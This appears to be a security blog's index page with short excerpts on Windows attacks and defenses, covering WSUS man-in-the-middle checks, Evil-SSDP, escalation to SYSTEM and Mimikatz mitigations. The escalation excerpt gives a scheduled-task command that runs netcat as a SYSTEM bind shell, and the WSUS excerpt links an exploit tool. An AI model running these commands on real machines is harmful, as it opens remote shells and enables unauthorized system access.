WSUS attacks

Reading Time: < 1 minuteto check if a Win domain is a possible candidate to a MITM WSUS attack check reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer https://github.com/pimps/wsuxploit/ (requires a MITM attack for ex. with bettercap)...

Defend against Evil-SSDP

Reading Time: < 1 minuteEvil-SSDP can be found at https://github.com/initstring/evil-ssdp Disable your firewall to block SSDP netsh advfirewall firewall set rule group=”Network Discovery” new...

Windows from privilege level to SYSTEM

Reading Time: < 1 minuteA classic way to achieve this is via Scheduled Task Copy netcat to c:\temp (for example) schtasks /create /RU SYSTEM /SC weekly /D Sat /TN SysMe /TR “c:\temp\nc.exe -e cmd -l -p 666” /ST 10:00:00 and then run it with Schtasks...

Defenses against Mimikatz

Reading Time: < 1 minuteas written in this blogpost mimikatz is an amazing tool to read password from a Window machine (either LSASS process, or Registry keys and other means). How can we defend against it ? Run LSASS process as “RunAsPPL”...